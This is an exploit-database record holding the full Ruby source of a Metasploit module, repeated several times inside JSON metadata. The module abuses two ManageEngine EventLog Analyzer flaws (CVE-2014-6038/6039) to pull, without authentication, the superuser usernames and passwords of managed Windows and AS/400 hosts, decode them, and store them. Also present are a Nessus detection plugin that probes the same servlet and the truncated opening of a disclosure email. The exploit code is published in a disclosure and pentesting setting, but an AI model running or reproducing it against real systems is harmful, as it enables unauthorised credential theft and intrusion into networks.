ID 1337DAY-ID-22839 Type zdt Reporter Pedro Ribeiro Modified 2014-11-10T00:00:00
Description
ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7 the TARGETURI has to be prepended with /event.#### Usage Info
msf > use auxiliary/gather/eventlog_cred_disclosure msf auxiliary(eventlog_cred_disclosure) > show actions ...actions... msf auxiliary(eventlog_cred_disclosure) > set ACTION <action-name> msf auxiliary(eventlog_cred_disclosure) > show options ...show and set options... msf auxiliary(eventlog_cred_disclosure) > run
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
'Description' => %q{
ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
allow an unauthenticated user to obtain the superuser password of any managed Windows and
AS/400 hosts. This module abuses both vulnerabilities to collect all the available
usernames and passwords. First the agentHandler servlet is abused to get the hostid and
slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames
and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7
the TARGETURI has to be prepended with /event.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6038' ],
[ 'CVE', '2014-6039' ],
[ 'OSVDB', '114342' ],
[ 'OSVDB', '114344' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]
],
'DisclosureDate' => 'Nov 5 2014'))
register_options(
[
Opt::RPORT(8400),
OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
], self.class)
end
def decode_password(encoded_password)
password_xor = Rex::Text.decode_base64(encoded_password)
password = ''
password_xor.bytes.each do |byte|
password << (byte ^ 0x30)
end
return password
end
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'agentHandler'),
'method' =>'GET',
'vars_get' => {
'mode' => 'getTableData',
'table' => 'HostDetails'
}
})
unless res && res.code == 200
fail_with(Failure::NotFound, "#{peer} - Failed to reach agentHandler servlet")
return
end
# When passwords have digits the XML parsing will fail.
# Replace with an empty password attribute so that we know the device has a password
# and therefore we want to add it to our host list.
xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))
begin
doc = REXML::Document.new(xml)
rescue
fail_with(Failure::Unknown, "#{peer} - Error parsing the XML, dumping output #{xml}")
end
slid_host_ary = []
doc.elements.each('Details/HostDetails') do |ele|
if ele.attributes['password']
# If an element doesn't have a password, then we don't care about it.
# Otherwise store the slid and host_id to use later.
slid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]
end
end
cred_table = Rex::Ui::Text::Table.new(
'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
'Indent' => 1,
'Columns' =>
[
'Host',
'Type',
'SubType',
'Domain',
'Username',
'Password',
]
)
slid_host_ary.each do |host|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'hostdetails'),
'method' =>'GET',
'vars_get' => {
'slid' => host[0],
'hostid' => host[1]
}
})
unless res && res.code == 200
fail_with(Failure::NotFound, "#{peer} - Failed to reach hostdetails servlet")
end
begin
doc = REXML::Document.new(res.body)
rescue
fail_with(Failure::Unknown, "#{peer} - Error parsing the XML, dumping output #{res.body.to_s}")
end
doc.elements.each('Details/Hosts') do |ele|
# Add an empty string if a variable doesn't exist, we have to check it
# somewhere and it's easier to do it here.
host_ipaddress = ele.attributes['host_ipaddress'] || ''
ele.elements.each('HostDetails') do |details|
domain_name = details.attributes['domain_name'] || ''
username = details.attributes['username'] || ''
password_encoded = details.attributes['password'] || ''
password = decode_password(password_encoded)
type = details.attributes['type'] || ''
subtype = details.attributes['subtype'] || ''
unless type =~ /Windows/ || subtype =~ /Windows/
# With AS/400 we get some garbage in the domain name even though it doesn't exist
domain_name = ""
end
msg = "Got login to #{host_ipaddress} | running "
msg << type << (subtype != '' ? " | #{subtype}" : '')
msg << ' | username: '
msg << (domain_name != '' ? "#{domain_name}\\#{username}" : username)
msg << " | password: #{password}"
print_good(msg)
cred_table << [host_ipaddress, type, subtype, domain_name, username, password]
if type == 'Windows'
service_name = 'epmap'
port = 135
elsif type == 'IBM AS/400'
service_name = 'as-servermap'
port = 449
else
next
end
credential_core = report_credential_core({
password: password,
username: username,
})
host_login_data = {
address: host_ipaddress,
service_name: service_name,
workspace_id: myworkspace_id,
protocol: 'tcp',
port: port,
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
create_credential_login(host_login_data)
end
end
end
print_line
print_line("#{cred_table}")
loot_name = 'manageengine.eventlog.managed_hosts.creds'
loot_type = 'text/csv'
loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'
loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
p = store_loot(
loot_name,
loot_type,
rhost,
cred_table.to_csv,
loot_filename,
loot_desc)
print_status "Credentials saved in: #{p}"
end
def report_credential_core(cred_opts={})
# Set up the has for our Origin service
origin_service_data = {
address: rhost,
port: rport,
service_name: (ssl ? 'https' : 'http'),
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_type: :password,
private_data: cred_opts[:password],
username: cred_opts[:username]
}
credential_data.merge!(origin_service_data)
create_credential(credential_data)
end
end
# 0day.today [2018-04-14] #
{"published": "2014-11-10T00:00:00", "id": "1337DAY-ID-22839", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:15:47", "bulletin": {"published": "2014-11-10T00:00:00", "id": "1337DAY-ID-22839", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.8, "modified": "2016-04-20T01:15:47", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/"}}, "hash": "6eaaee0b99e8b960942710aa198fd03f2de1d98a3de27e1e7843537f4dc90981", "description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7 the TARGETURI has to be prepended with /event.#### Usage Info\nmsf > use auxiliary/gather/eventlog_cred_disclosure msf auxiliary(eventlog_cred_disclosure) > show actions ...actions... msf auxiliary(eventlog_cred_disclosure) > set ACTION <action-name> msf auxiliary(eventlog_cred_disclosure) > show options ...show and set options... msf auxiliary(eventlog_cred_disclosure) > run", "type": "zdt", "lastseen": "2016-04-20T01:15:47", "edition": 1, "title": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure", "href": "http://0day.today/exploit/description/22839", "modified": "2014-11-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": ["CVE-2014-6038", "CVE-2014-6039"], "sourceHref": "http://0day.today/exploit/22839", "references": [], "reporter": "Pedro Ribeiro", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nrequire 'msf/core'\r\nrequire 'rexml/document'\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Auxiliary::Report\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',\r\n'Description' => %q{\r\nManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\r\nallow an unauthenticated user to obtain the superuser password of any managed Windows and\r\nAS/400 hosts. This module abuses both vulnerabilities to collect all the available\r\nusernames and passwords. First the agentHandler servlet is abused to get the hostid and\r\nslid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames\r\nand passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7\r\nthe TARGETURI has to be prepended with /event.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6038' ],\r\n[ 'CVE', '2014-6039' ],\r\n[ 'OSVDB', '114342' ],\r\n[ 'OSVDB', '114344' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]\r\n],\r\n'DisclosureDate' => 'Nov 5 2014'))\r\nregister_options(\r\n[\r\nOpt::RPORT(8400),\r\nOptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),\r\n], self.class)\r\nend\r\ndef decode_password(encoded_password)\r\npassword_xor = Rex::Text.decode_base64(encoded_password)\r\npassword = ''\r\npassword_xor.bytes.each do |byte|\r\npassword << (byte ^ 0x30)\r\nend\r\nreturn password\r\nend\r\ndef run\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'agentHandler'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'mode' => 'getTableData',\r\n'table' => 'HostDetails'\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach agentHandler servlet\")\r\nreturn\r\nend\r\n# When passwords have digits the XML parsing will fail.\r\n# Replace with an empty password attribute so that we know the device has a password\r\n# and therefore we want to add it to our host list.\r\nxml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))\r\nbegin\r\ndoc = REXML::Document.new(xml)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{xml}\")\r\nend\r\nslid_host_ary = []\r\ndoc.elements.each('Details/HostDetails') do |ele|\r\nif ele.attributes['password']\r\n# If an element doesn't have a password, then we don't care about it.\r\n# Otherwise store the slid and host_id to use later.\r\nslid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]\r\nend\r\nend\r\ncred_table = Rex::Ui::Text::Table.new(\r\n'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',\r\n'Indent' => 1,\r\n'Columns' =>\r\n[\r\n'Host',\r\n'Type',\r\n'SubType',\r\n'Domain',\r\n'Username',\r\n'Password',\r\n]\r\n)\r\nslid_host_ary.each do |host|\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'hostdetails'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'slid' => host[0],\r\n'hostid' => host[1]\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach hostdetails servlet\")\r\nend\r\nbegin\r\ndoc = REXML::Document.new(res.body)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{res.body.to_s}\")\r\nend\r\ndoc.elements.each('Details/Hosts') do |ele|\r\n# Add an empty string if a variable doesn't exist, we have to check it\r\n# somewhere and it's easier to do it here.\r\nhost_ipaddress = ele.attributes['host_ipaddress'] || ''\r\nele.elements.each('HostDetails') do |details|\r\ndomain_name = details.attributes['domain_name'] || ''\r\nusername = details.attributes['username'] || ''\r\npassword_encoded = details.attributes['password'] || ''\r\npassword = decode_password(password_encoded)\r\ntype = details.attributes['type'] || ''\r\nsubtype = details.attributes['subtype'] || ''\r\nunless type =~ /Windows/ || subtype =~ /Windows/\r\n# With AS/400 we get some garbage in the domain name even though it doesn't exist\r\ndomain_name = \"\"\r\nend\r\nmsg = \"Got login to #{host_ipaddress} | running \"\r\nmsg << type << (subtype != '' ? \" | #{subtype}\" : '')\r\nmsg << ' | username: '\r\nmsg << (domain_name != '' ? \"#{domain_name}\\\\#{username}\" : username)\r\nmsg << \" | password: #{password}\"\r\nprint_good(msg)\r\ncred_table << [host_ipaddress, type, subtype, domain_name, username, password]\r\nif type == 'Windows'\r\nservice_name = 'epmap'\r\nport = 135\r\nelsif type == 'IBM AS/400'\r\nservice_name = 'as-servermap'\r\nport = 449\r\nelse\r\nnext\r\nend\r\ncredential_core = report_credential_core({\r\npassword: password,\r\nusername: username,\r\n})\r\nhost_login_data = {\r\naddress: host_ipaddress,\r\nservice_name: service_name,\r\nworkspace_id: myworkspace_id,\r\nprotocol: 'tcp',\r\nport: port,\r\ncore: credential_core,\r\nstatus: Metasploit::Model::Login::Status::UNTRIED\r\n}\r\ncreate_credential_login(host_login_data)\r\nend\r\nend\r\nend\r\nprint_line\r\nprint_line(\"#{cred_table}\")\r\nloot_name = 'manageengine.eventlog.managed_hosts.creds'\r\nloot_type = 'text/csv'\r\nloot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'\r\nloot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'\r\np = store_loot(\r\nloot_name,\r\nloot_type,\r\nrhost,\r\ncred_table.to_csv,\r\nloot_filename,\r\nloot_desc)\r\nprint_status \"Credentials saved in: #{p}\"\r\nend\r\ndef report_credential_core(cred_opts={})\r\n# Set up the has for our Origin service\r\norigin_service_data = {\r\naddress: rhost,\r\nport: rport,\r\nservice_name: (ssl ? 'https' : 'http'),\r\nprotocol: 'tcp',\r\nworkspace_id: myworkspace_id\r\n}\r\ncredential_data = {\r\norigin_type: :service,\r\nmodule_fullname: self.fullname,\r\nprivate_type: :password,\r\nprivate_data: cred_opts[:password],\r\nusername: cred_opts[:username]\r\n}\r\ncredential_data.merge!(origin_service_data)\r\ncreate_credential(credential_data)\r\nend\r\nend\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f01b1ab3e618faa029e9bd5ed5ae6625", "key": "title"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "57b935b395d7ec2e297bfe7879f1cf9c", "key": "href"}, {"hash": "e04ff4477a3019f6a37321dc1a05f8f4", "key": "reporter"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "modified"}, {"hash": "e873b4af926fd58223684d39f4401b79", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ace0eeb6de2686a46d53610085149162", "key": "sourceHref"}, {"hash": "b3d33fe4939262fa2ff3c8607bc68aee", "key": "sourceData"}, {"hash": "f4b31ab4bdb4839c4a9135507604a89c", "key": "cvelist"}], "objectVersion": "1.0"}}], "description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7 the TARGETURI has to be prepended with /event.#### Usage Info\nmsf > use auxiliary/gather/eventlog_cred_disclosure msf auxiliary(eventlog_cred_disclosure) > show actions ...actions... msf auxiliary(eventlog_cred_disclosure) > set ACTION <action-name> msf auxiliary(eventlog_cred_disclosure) > show options ...show and set options... msf auxiliary(eventlog_cred_disclosure) > run", "hash": "44980da975763a86d21a11450aa9e79c6f4d63457f140950a7afddf89a058e87", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-04-14T11:46:15"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31449", "SECURITYVULNS:VULN:14113"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105111"]}, {"type": "exploitdb", "idList": ["EDB-ID:43893"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128996"]}, {"type": "zdt", "idList": ["1337DAY-ID-22829", "1337DAY-ID-29644"]}, {"type": "nessus", "idList": ["MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2014-6038.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/EVENTLOG_CRED_DISCLOSURE"]}], "modified": "2018-04-14T11:46:15"}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-04-14T11:46:15", "edition": 2, "title": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure", "href": "https://0day.today/exploit/description/22839", "modified": "2014-11-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": ["CVE-2014-6038", "CVE-2014-6039"], "sourceHref": "https://0day.today/exploit/22839", "references": [], "reporter": "Pedro Ribeiro", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nrequire 'msf/core'\r\nrequire 'rexml/document'\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Auxiliary::Report\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',\r\n'Description' => %q{\r\nManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\r\nallow an unauthenticated user to obtain the superuser password of any managed Windows and\r\nAS/400 hosts. This module abuses both vulnerabilities to collect all the available\r\nusernames and passwords. First the agentHandler servlet is abused to get the hostid and\r\nslid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames\r\nand passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7\r\nthe TARGETURI has to be prepended with /event.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6038' ],\r\n[ 'CVE', '2014-6039' ],\r\n[ 'OSVDB', '114342' ],\r\n[ 'OSVDB', '114344' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]\r\n],\r\n'DisclosureDate' => 'Nov 5 2014'))\r\nregister_options(\r\n[\r\nOpt::RPORT(8400),\r\nOptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),\r\n], self.class)\r\nend\r\ndef decode_password(encoded_password)\r\npassword_xor = Rex::Text.decode_base64(encoded_password)\r\npassword = ''\r\npassword_xor.bytes.each do |byte|\r\npassword << (byte ^ 0x30)\r\nend\r\nreturn password\r\nend\r\ndef run\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'agentHandler'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'mode' => 'getTableData',\r\n'table' => 'HostDetails'\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach agentHandler servlet\")\r\nreturn\r\nend\r\n# When passwords have digits the XML parsing will fail.\r\n# Replace with an empty password attribute so that we know the device has a password\r\n# and therefore we want to add it to our host list.\r\nxml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))\r\nbegin\r\ndoc = REXML::Document.new(xml)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{xml}\")\r\nend\r\nslid_host_ary = []\r\ndoc.elements.each('Details/HostDetails') do |ele|\r\nif ele.attributes['password']\r\n# If an element doesn't have a password, then we don't care about it.\r\n# Otherwise store the slid and host_id to use later.\r\nslid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]\r\nend\r\nend\r\ncred_table = Rex::Ui::Text::Table.new(\r\n'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',\r\n'Indent' => 1,\r\n'Columns' =>\r\n[\r\n'Host',\r\n'Type',\r\n'SubType',\r\n'Domain',\r\n'Username',\r\n'Password',\r\n]\r\n)\r\nslid_host_ary.each do |host|\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'hostdetails'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'slid' => host[0],\r\n'hostid' => host[1]\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach hostdetails servlet\")\r\nend\r\nbegin\r\ndoc = REXML::Document.new(res.body)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{res.body.to_s}\")\r\nend\r\ndoc.elements.each('Details/Hosts') do |ele|\r\n# Add an empty string if a variable doesn't exist, we have to check it\r\n# somewhere and it's easier to do it here.\r\nhost_ipaddress = ele.attributes['host_ipaddress'] || ''\r\nele.elements.each('HostDetails') do |details|\r\ndomain_name = details.attributes['domain_name'] || ''\r\nusername = details.attributes['username'] || ''\r\npassword_encoded = details.attributes['password'] || ''\r\npassword = decode_password(password_encoded)\r\ntype = details.attributes['type'] || ''\r\nsubtype = details.attributes['subtype'] || ''\r\nunless type =~ /Windows/ || subtype =~ /Windows/\r\n# With AS/400 we get some garbage in the domain name even though it doesn't exist\r\ndomain_name = \"\"\r\nend\r\nmsg = \"Got login to #{host_ipaddress} | running \"\r\nmsg << type << (subtype != '' ? \" | #{subtype}\" : '')\r\nmsg << ' | username: '\r\nmsg << (domain_name != '' ? \"#{domain_name}\\\\#{username}\" : username)\r\nmsg << \" | password: #{password}\"\r\nprint_good(msg)\r\ncred_table << [host_ipaddress, type, subtype, domain_name, username, password]\r\nif type == 'Windows'\r\nservice_name = 'epmap'\r\nport = 135\r\nelsif type == 'IBM AS/400'\r\nservice_name = 'as-servermap'\r\nport = 449\r\nelse\r\nnext\r\nend\r\ncredential_core = report_credential_core({\r\npassword: password,\r\nusername: username,\r\n})\r\nhost_login_data = {\r\naddress: host_ipaddress,\r\nservice_name: service_name,\r\nworkspace_id: myworkspace_id,\r\nprotocol: 'tcp',\r\nport: port,\r\ncore: credential_core,\r\nstatus: Metasploit::Model::Login::Status::UNTRIED\r\n}\r\ncreate_credential_login(host_login_data)\r\nend\r\nend\r\nend\r\nprint_line\r\nprint_line(\"#{cred_table}\")\r\nloot_name = 'manageengine.eventlog.managed_hosts.creds'\r\nloot_type = 'text/csv'\r\nloot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'\r\nloot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'\r\np = store_loot(\r\nloot_name,\r\nloot_type,\r\nrhost,\r\ncred_table.to_csv,\r\nloot_filename,\r\nloot_desc)\r\nprint_status \"Credentials saved in: #{p}\"\r\nend\r\ndef report_credential_core(cred_opts={})\r\n# Set up the has for our Origin service\r\norigin_service_data = {\r\naddress: rhost,\r\nport: rport,\r\nservice_name: (ssl ? 'https' : 'http'),\r\nprotocol: 'tcp',\r\nworkspace_id: myworkspace_id\r\n}\r\ncredential_data = {\r\norigin_type: :service,\r\nmodule_fullname: self.fullname,\r\nprivate_type: :password,\r\nprivate_data: cred_opts[:password],\r\nusername: cred_opts[:username]\r\n}\r\ncredential_data.merge!(origin_service_data)\r\ncreate_credential(credential_data)\r\nend\r\nend\n\n# 0day.today [2018-04-14] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f4b31ab4bdb4839c4a9135507604a89c", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e873b4af926fd58223684d39f4401b79", "key": "description"}, {"hash": "92244d3b782998b53676280da63cfaea", "key": "href"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "modified"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e04ff4477a3019f6a37321dc1a05f8f4", "key": "reporter"}, {"hash": "7cc3c110c1ab29967629be4390fbf452", "key": "sourceData"}, {"hash": "31d97ba998074182267891c437df5e58", "key": "sourceHref"}, {"hash": "f01b1ab3e618faa029e9bd5ed5ae6625", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"nessus": [{"lastseen": "2019-11-01T02:54:54", "bulletinFamily": "scanner", "description": "The EventLog Analyzer version installed on the remote web server is\naffected by multiple information disclosure vulnerabilities :\n\n - A flaw exists in the ", "modified": "2019-11-02T00:00:00", "id": "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2014-6038.NASL", "href": "https://www.tenable.com/plugins/nessus/81402", "published": "2015-02-18T00:00:00", "title": "ManageEngine EventLog Analyzer 'agentHandler' Information Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81402);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n\n script_cve_id(\"CVE-2014-6038\",\"CVE-2014-6039\");\n script_bugtraq_id(70959,70960);\n\n script_name(english:\"ManageEngine EventLog Analyzer 'agentHandler' Information Disclosure\");\n script_summary(english:\"Tries to exploit the issue.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by\nmultiple information disclosure vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The EventLog Analyzer version installed on the remote web server is\naffected by multiple information disclosure vulnerabilities :\n\n - A flaw exists in the 'agentHandler' servlet that allows\n a remote attacker to retrieve user names and password\n hashes and other sensitive information. (CVE-2014-6038)\n\n - A flaw exists in the 'hostdetails' servlet that allows a\n remote attacker to retrieve user names and passwords for\n systems managed by EventLog Analyzer. (CVE-2014-6039)\n\nNote that Nessus only checked for the flaw outlined by CVE-2014-6038;\nhowever, it is highly likely that the version is also affected by the\nflaw outlined in CVE-2014-6039.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.manageengine.com/products/eventlog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2014/Nov/32\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 10 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_eventlog_analyzer\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_eventlog_analyzer_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine EventLog Analyzer\");\n script_require_ports(\"Services/www\", 8400);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"ManageEngine EventLog Analyzer\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8400);\ninst = get_single_install(app_name:app,port:port);\nurl = build_url(port:port, qs:inst[\"path\"]);\nitem = \"/agentHandler?mode=getTableData&table=AaaUser\";\nres = http_send_recv3(\n method : \"GET\",\n item : item,\n port : port\n);\nreq = build_url(qs:item, port:port);\n\n# Patch host simply responds \"Access Denied\"\nif(res[2] =~ \"<Details>.*<\\/Details>\")\n{\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n request : make_list(req),\n output : data_protection::sanitize_user_full_redaction(output:chomp(res[2]))\n );\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED,app,url);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:41", "bulletinFamily": "exploit", "description": "", "modified": "2014-11-06T00:00:00", "published": "2014-11-06T00:00:00", "href": "https://packetstormsecurity.com/files/128996/ManageEngine-EventLog-Analyzer-SQL-Credential-Disclosure.html", "id": "PACKETSTORM:128996", "type": "packetstorm", "title": "ManageEngine EventLog Analyzer SQL / Credential Disclosure", "sourceData": "`Hi, \n \nThis is the 6th part of the ManageOwnage series. For previous parts see [1]. \n \nThis time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be \nabused to dump information from the database and obtain the superuser \ncredentials for Windows and AS/400 hosts which are managed by EventLog \nAnalyzer. A Metasploit module has also been released and should be \nintegrated in the framework in the next 